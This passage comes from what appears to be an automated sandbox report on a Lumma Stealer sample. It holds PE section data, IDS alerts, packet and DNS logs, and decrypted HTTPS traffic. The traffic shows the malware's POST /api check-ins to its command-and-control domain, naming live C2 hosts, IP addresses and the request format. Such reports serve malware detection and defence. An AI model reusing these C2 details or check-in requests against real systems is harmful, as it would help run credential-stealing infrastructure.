                                                                      lvdvpuxj0x5b0000x2a70000x2a6c00c575ad8b032af3e64c1913478eafb879unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      foyvnwhq0x3020000x10000x400e54e55d8810a060e44f0121d4c65c65cFalse0.7314453125data5.8130454496196755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .taggant0x3030000x30000x22003a7c0d3d0fd5f944344cd37ab92116eeFalse0.0705422794117647DOS executable (COM)0.7483646215590711IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dlllstrcpy

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-30T08:22:10.450006+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.6627441.1.1.153UDP
                                                                      2024-10-30T08:22:10.469901+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.6627081.1.1.153UDP
                                                                      2024-10-30T08:22:10.481879+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.6605051.1.1.153UDP
                                                                      2024-10-30T08:22:10.496016+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.6543471.1.1.153UDP
                                                                      2024-10-30T08:22:10.514628+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.6607301.1.1.153UDP
                                                                      2024-10-30T08:22:11.163524+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649710188.114.96.3443TCP
                                                                      2024-10-30T08:22:11.689997+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710188.114.96.3443TCP
                                                                      2024-10-30T08:22:11.689997+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710188.114.96.3443TCP
                                                                      2024-10-30T08:22:12.359132+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649711188.114.96.3443TCP
                                                                      2024-10-30T08:22:12.907514+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649711188.114.96.3443TCP
                                                                      2024-10-30T08:22:12.907514+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711188.114.96.3443TCP
                                                                      2024-10-30T08:22:13.763866+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649713188.114.96.3443TCP
                                                                      2024-10-30T08:22:14.287670+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649713188.114.96.3443TCP
                                                                      2024-10-30T08:22:14.983235+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649719188.114.96.3443TCP
                                                                      2024-10-30T08:22:16.565849+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649725188.114.96.3443TCP
                                                                      2024-10-30T08:22:18.379285+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649736188.114.96.3443TCP
                                                                      2024-10-30T08:22:20.185206+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649748188.114.96.3443TCP
                                                                      2024-10-30T08:22:22.420516+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649764188.114.96.3443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 30, 2024 08:22:10.532677889 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:10.532716036 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:10.532785892 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:10.535788059 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:10.535804987 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.163435936 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.163523912 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.165782928 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.165793896 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.166065931 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.217024088 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.220474958 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.220489025 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.220597982 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.690046072 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.690166950 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.690238953 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.691807985 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.691828012 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.691847086 CET49710443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.691853046 CET44349710188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.744637012 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.744680882 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:11.744780064 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.745062113 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:11.745075941 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.359045982 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.359132051 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.424346924 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.424371004 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.424751997 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.426196098 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.426234961 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.426276922 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.907517910 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.907589912 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.907629967 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.907648087 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.907661915 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.907705069 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.907717943 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.908225060 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.908263922 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.908282995 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.908288002 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.908406973 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:12.908411980 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:12.951464891 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.025593042 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025697947 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025746107 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025790930 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.025795937 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025805950 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025854111 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.025871992 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025938988 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.025943995 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.025993109 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.026257992 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.026282072 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.026293039 CET49711443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.026299000 CET44349711188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.156490088 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.156532049 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.156647921 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.156969070 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.156985044 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.763679981 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.763865948 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.766002893 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.766014099 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.766258955 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:13.767729044 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.767891884 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:13.767921925 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.287682056 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.287801981 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.287856102 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.287987947 CET49713443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.288005114 CET44349713188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.375514030 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.375555038 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.375664949 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.376003981 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.376018047 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.983141899 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.983234882 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.989012957 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.989027023 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.989269972 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.990709066 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.990852118 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.990883112 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:14.990958929 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:14.990967035 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:15.751363039 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:15.751487970 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:15.751569986 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:15.753164053 CET49719443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:15.753181934 CET44349719188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:15.957251072 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:15.957310915 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:15.957425117 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:15.957772017 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:15.957803965 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:16.565753937 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:16.565849066 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:16.567598104 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:16.567610025 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:16.567856073 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:16.569154978 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:16.569340944 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:16.569379091 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:16.569442034 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:16.569458961 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:17.431565046 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:17.431665897 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:17.431817055 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:17.432096958 CET49725443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:17.432116985 CET44349725188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:17.768135071 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:17.768170118 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:17.768253088 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:17.768635988 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:17.768649101 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:18.379179001 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:18.379285097 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:18.422791958 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:18.422822952 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:18.423182011 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:18.424911022 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:18.425014973 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:18.425026894 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:19.121542931 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:19.121665955 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:19.121756077 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:19.121959925 CET49736443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:19.121979952 CET44349736188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:19.575841904 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:19.575906992 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:19.576173067 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:19.576935053 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:19.576950073 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.185075998 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.185205936 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.186805964 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.186811924 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.187041044 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.209911108 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.210748911 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.210768938 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.210994959 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.211019039 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.211639881 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.211661100 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.211755991 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.211767912 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.211921930 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.211942911 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.212060928 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.212085009 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.212096930 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.212107897 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.212208986 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.212224960 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.212243080 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.212444067 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.212471962 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.221914053 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.222100019 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.222136974 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.222163916 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.222209930 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:20.222616911 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:20.222632885 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:21.996944904 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:21.997056007 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:21.997144938 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:21.997409105 CET49748443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:21.997421980 CET44349748188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:22.026902914 CET49764443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:22.026947975 CET44349764188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:22.027029991 CET49764443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:22.027381897 CET49764443192.168.2.6188.114.96.3
                                                                      Oct 30, 2024 08:22:22.027391911 CET44349764188.114.96.3192.168.2.6
                                                                      Oct 30, 2024 08:22:22.420516014 CET49764443192.168.2.6188.114.96.3

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 30, 2024 08:22:10.450006008 CET6274453192.168.2.61.1.1.1
                                                                      Oct 30, 2024 08:22:10.459212065 CET53627441.1.1.1192.168.2.6
                                                                      Oct 30, 2024 08:22:10.469901085 CET6270853192.168.2.61.1.1.1
                                                                      Oct 30, 2024 08:22:10.479208946 CET53627081.1.1.1192.168.2.6
                                                                      Oct 30, 2024 08:22:10.481878996 CET6050553192.168.2.61.1.1.1
                                                                      Oct 30, 2024 08:22:10.492482901 CET53605051.1.1.1192.168.2.6
                                                                      Oct 30, 2024 08:22:10.496016026 CET5434753192.168.2.61.1.1.1
                                                                      Oct 30, 2024 08:22:10.505587101 CET53543471.1.1.1192.168.2.6
                                                                      Oct 30, 2024 08:22:10.514627934 CET6073053192.168.2.61.1.1.1
                                                                      Oct 30, 2024 08:22:10.527261972 CET53607301.1.1.1192.168.2.6

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 30, 2024 08:22:10.450006008 CET192.168.2.61.1.1.10x5bcStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.469901085 CET192.168.2.61.1.1.10x9b88Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.481878996 CET192.168.2.61.1.1.10xae82Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.496016026 CET192.168.2.61.1.1.10x5475Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.514627934 CET192.168.2.61.1.1.10x4b11Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 30, 2024 08:22:10.459212065 CET1.1.1.1192.168.2.60x5bcName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.479208946 CET1.1.1.1192.168.2.60x9b88Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.492482901 CET1.1.1.1192.168.2.60xae82Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.505587101 CET1.1.1.1192.168.2.60x5475Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.527261972 CET1.1.1.1192.168.2.60x4b11No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                      Oct 30, 2024 08:22:10.527261972 CET1.1.1.1192.168.2.60x4b11No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • necklacedmny.store

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649710188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:11 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-10-30 07:22:11 UTC1017INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=i0rpvhf6nh09ektatu6g2krff8; expires=Sun, 23 Feb 2025 01:08:50 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9nGl2dPuDWBc2040HqotkrTx05uEAvVbH2PPP7AB1MITUSqt4jRK2LWRBoZ%2B5g%2F%2F%2BgbDhh19qjyHpWFAiHxKBrmyd8KtczNVwkAOfZAasutLX9qLSQyCITZFejILc3t%2BGx5ezDk%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a71c8f2fa922-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1352&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2234567&cwnd=177&unsent_bytes=0&cid=f271468c152c3680&ts=537&x=0"
                                                                      2024-10-30 07:22:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-10-30 07:22:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649711188.114.96.34431408C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 07:22:12 UTC266OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 52
                                                                      Host: necklacedmny.store
                                                                      2024-10-30 07:22:12 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                      2024-10-30 07:22:12 UTC1016INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 07:22:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=5gn3o0volo1j7km55advp7mulu; expires=Sun, 23 Feb 2025 01:08:51 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PygtS4P50yM9lGLniUH3pUvbpDwnFdmW8r9pTdiFsn7e8676IVZBSbUu5zqLm%2BQ0itXJozxyfY%2FFWFJb0ASa1Ed3PW5a9RseUXe27zpfg%2BBe5j373tWa%2FZNu7LRDPk%2B90h7bDkw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8da9a72419fb6b64-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=978&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2961145&cwnd=250&unsent_bytes=0&cid=c4147b3674342291&ts=556&x=0"
